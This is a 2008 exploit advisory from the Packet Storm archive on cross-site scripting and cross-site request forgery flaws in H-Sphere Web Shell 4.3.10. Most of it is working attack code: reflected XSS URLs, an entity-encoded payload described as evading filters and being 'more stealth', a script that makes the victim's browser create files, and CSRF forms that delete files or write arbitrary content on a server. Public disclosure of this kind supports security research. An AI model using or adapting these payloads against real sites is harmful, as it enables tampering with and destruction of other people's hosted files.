what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

webshell431-xssxsrf.txt

webshell431-xssxsrf.txt
Posted Oct 1, 2008
Authored by C1c4Tr1Z | Site lowsec.org

Web Shell version 4.3.10 suffers from cross site scripting and cross site request forgery vulnerabilities.

tags | exploit, web, shell, vulnerability, xss, csrf
SHA-256 | 6e8d82dccfcb8967815932a7827b2ac2a47e37b85a6e180963497ecd0c82fe86

webshell431-xssxsrf.txt

Change Mirror Download
#=======================================================================#
.____ _________ ._.
| | ______ _ __/ _____/ ____ ____| |
| | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ |
| |__( <_> ) / / \ ___/\ \___\|
|_______ \____/ \/\_/ /_______ /\___ >\___ >_
\/ \/ \/ \/\/
(http://www.lowsec.org)
#========================================================================#
#========================================================================#
Author: C1c4Tr1Z
Date: 28/09/08
Application: Web Shell version 4.3.10 (2006)
Product WebSite: http://www.psoft.net/HSdocumentation/sysadmin/hsphere-webshell.html
Issues:
[-]Cross-Site Scripting
[-]Cross-Site Request Forgery

Special thanks to OzX (http://www.nullbytes.net/)!

#========================================================================#
#=============================[XSS]======================================#

Proof-of-Concepts:

/actions.php?m=dload&fn=%3Ciframe/src=javascript:alert(%27XSS%27)%3E
/actions.php?m=search&start=1 [POST data: fld=%2F&mask=%3Ciframe%2Fsrc%3Djavascript%3Aalert%280%29%3E]

<!--
This piece of injection would give you the posibility to create a file (filename: "/XSS") with a simple JavaScript code.
Note: you can change the window.open() for an <iframe> to make it more stealth.
Note2: the code is decimal and hexadecimal encoded, to make a successful injection.
Note3: this script uses XMLHttpRequest() so test it on Firefox!
-->
/actions.php?m=sysinfo&tab=1'><img/src/onerror=%26%23119%26%23105%26%23116%26%23104%26%2340%26%23110%26%23101%26%23119%26%2332%26%2388%26%2377%26%2376%26%2372%26%23116%26%23116%26%23112%26%2382%26%23101%26%23113%26%23117%26%23101%26%23115%26%23116%26%2340%26%2341%26%2341%26%23123%26%2310%26%239%26%23111%26%23112%26%23101%26%23110%26%2340%26%2339%26%2371%26%2369%26%2384%26%2339%26%2344%26%2339%26%23104%26%23116%26%23116%26%23112%26%2358%26%2347%26%2347%26%2357%26%2356%26%2346%26%2349%26%2351%26%2349%26%2346%26%2349%26%2354%26%2352%26%2346%26%2353%26%2347%26%23119%26%23101%26%2398%26%23115%26%23104%26%23101%26%23108%26%23108%26%2352%26%2347%26%2397%26%2399%26%23116%26%23105%26%23111%26%23110%26%23115%26%2346%26%23112%26%23104%26%23112%26%2363%26%23109%26%2361%26%23102%26%23117%26%23116%26%23105%26%23108%26%23115%26%2338%26%2397%26%2399%26%2361%26%23109%26%23107%26%23100%26%2339%26%2344%26%23116%26%23114%26%23117%26%23101%26%2341%26%2344%26%2310%26%239%26%23115%26%23101%26%23110%26%23100%26%2340%26%23110%26%23117%26%23108%26%23108%26%2341%26%2344%26%2310%26%239%26%23111%26%23110%26%23114%26%23101%26%2397%26%23100%26%23121%26%23115%26%23116%26%2397%26%23116%26%23101%26%2399%26%23104%26%2397%26%23110%26%23103%26%23101%26%2361%26%23102%26%23117%26%23110%26%2399%26%23116%26%23105%26%23111%26%23110%26%2340%26%2341%26%23123%26%2310%26%239%26%239%26%23105%26%23102%26%2340%26%23114%26%23101%26%2397%26%23100%26%23121%26%2383%26%23116%26%2397%26%23116%26%23101%26%2361%26%2361%26%2352%26%2332%26%2338%26%2338%26%2332%26%23115%26%23116%26%2397%26%23116%26%23117%26%23115%26%2361%26%2361%26%2350%26%2348%26%2348%26%2341%26%23123%26%2310%26%239%26%239%26%239%26%23119%26%23105%26%23116%26%23104%26%2340%26%23119%26%23105%26%23110%26%23100%26%23111%26%23119%26%2346%26%23111%26%23112%26%23101%26%23110%26%2340%26%2339%26%2339%26%2344%26%2339%26%2395%26%2398%26%23108%26%2397%26%23110%26%23107%26%2339%26%2341%26%2341%26%23123%26%2310%26%239%26%239%26%239%26%239%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%23119%26%23114%26%23105%26%23116%26%23101%26%2340%26%23114%26%23101%26%23115%26%23112%26%23111%26%23110%26%23115%26%23101%26%2384%26%23101%26%23120%26%23116%26%2346%26%23114%26%23101%26%23112%26%23108%26%2397%26%2399%26%23101%26%2340%26%2347%26%2360%26%2392%26%2347%26%2398%26%23111%26%23100%26%23121%26%2362%26%2347%26%2344%26%2339%26%2360%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2362%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%23103%26%23101%26%23116%26%2369%26%23108%26%23101%26%23109%26%23101%26%23110%26%23116%26%23115%26%2366%26%23121%26%2384%26%2397%26%23103%26%2378%26%2397%26%23109%26%23101%26%2340%26%2334%26%23105%26%23110%26%23112%26%23117%26%23116%26%2334%26%2341%26%2391%26%2350%26%2393%26%2346%26%23118%26%2397%26%23108%26%23117%26%23101%26%2361%26%2334%26%2388%26%2383%26%2383%26%2334%26%2359%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%23102%26%23111%26%23114%26%23109%26%23115%26%2391%26%2348%26%2393%26%2346%26%23115%26%23117%26%2398%26%23109%26%23105%26%23116%26%2340%26%2341%26%2359%26%2360%26%2392%26%2347%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2362%26%2360%26%2347%26%2398%26%23111%26%23100%26%23121%26%2362%26%2339%26%2341%26%2341%26%2359%26%2310%26%239%26%239%26%239%26%239%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%2399%26%23108%26%23111%26%23115%26%23101%26%2340%26%2341%26%2359%26%2310%26%239%26%239%26%239%26%23125%26%2310%26%239%26%239%26%23125%26%2310%26%239%26%23125%26%2359%26%2310%26%23125>

clear js script:
----------------

with(new XMLHttpRequest()){open('GET','http://www.victim.com/actions.php?m=futils&ac=mkd',true),send(null),onreadystatechange=function(){if(readyState==4 && status==200){with(window.open('','_blank')){document.write(responseText.replace(/<\/body>/,'<script>document.getElementsByTagName("input")[2].value="XSS";document.forms[0].submit();<\/script></body>'));document.close();}}};}

#========================================================================#
#============================[CSRF]======================================#

The entire application is vulnerable to CSRF!!

Proof-of-Concepts:

<!--
Delete a file from the server.
-->
<img src="http://www.victim.com/actions.php?m=overkill&kill=1&pos=0&fn=FILENAME">


<!--
Create a directory. (Someone could test if this can lead us to XSS..)
-->
<form name='mkd' method='POST' action='http://www.victim.com/actions.php?m=futils&ac=mkd&create=1' enctype='application/x-www-form-urlencoded'>
<input type='hidden' name='do' value='yes'>
<INPUT type='text' class='text' name='dest' value="PATH">
<INPUT type='text' class='text' name='fld' value="DIR_NAME">
</form>
<script>document.forms[0].submit()</script>


<!--
Create a file with any type of content. (This is more than dangerous, this is madness..)
-->
<FORM name='editor' action='http://www.victim.com/actions.php?m=edit&save=1' method='POST' enctype='application/x-www-form-urlencoded'>
<INPUT type="hidden" name="dest">
<INPUT type='text' name='fln' value='/web_dir/FILENAME'>
<TEXTAREA name='body'>
FILE_CONTENT
</TEXTAREA>
</form>
<script>document.forms[0].submit();</script>

#========================================================================#
#========================================================================#
Contact: C1c4Tr1Z <c1c4tr1z@lowsec.org>
(http://www.lowsec.org)
LowSec! Web Application Security (Lab).
Deus ex Machina
#========================================================================#
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close